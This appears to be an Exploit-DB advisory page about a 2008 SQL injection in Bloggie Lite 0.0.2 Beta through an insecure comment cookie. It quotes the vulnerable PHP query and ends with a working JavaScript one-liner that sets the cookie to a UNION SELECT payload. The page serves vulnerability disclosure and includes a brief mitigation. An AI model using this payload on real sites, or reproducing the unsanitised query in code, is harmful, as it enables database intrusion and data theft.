Bloggie Lite 0.0.2 Beta SQl Injection by Insecure Cookie Handling

vendor:

Bloggie Lite

by:

JosS

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Bloggie Lite

Affected Version From: 0.0.2 Beta

Affected Version To: 0.0.2 Beta

Patch Exists: NO

Related CWE: N/A

CPE: a:mywebland:bloggie_lite

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Bloggie Lite 0.0.2 Beta SQl Injection by Insecure Cookie Handling

A SQL injection vulnerability exists in Bloggie Lite 0.0.2 Beta due to insecure cookie handling. An attacker can exploit this vulnerability by setting a malicious cookie value in the 'f528764d624db129b32c21fbca0cb8d6' cookie parameter. This can allow the attacker to execute arbitrary SQL commands on the underlying database.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

# Bloggie Lite 0.0.2 Beta SQl Injection by Insecure Cookie Handling
# url: http://mywebland.com/download.php?id=20
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

vuln file: /genscode.php
vuln code:
39: $user_ip = $_SERVER['REMOTE_ADDR'];
    define('COMMENT_COOKIE', md5($user_ip));
    if(isset($_COOKIE[COMMENT_COOKIE])) {
xx: ...
    $comment_cookie = $_COOKIE[COMMENT_COOKIE];
55: $sql = "SELECT * FROM ".SCODE_TBL." WHERE cookie = '".$comment_cookie."'";

exploit:
javascript:document.cookie = "f528764d624db129b32c21fbca0cb8d6=127.0.0.1'+union+all+select+user(),user(),user()/*; path=/";

Hack0wn :D

# milw0rm.com [2008-11-01]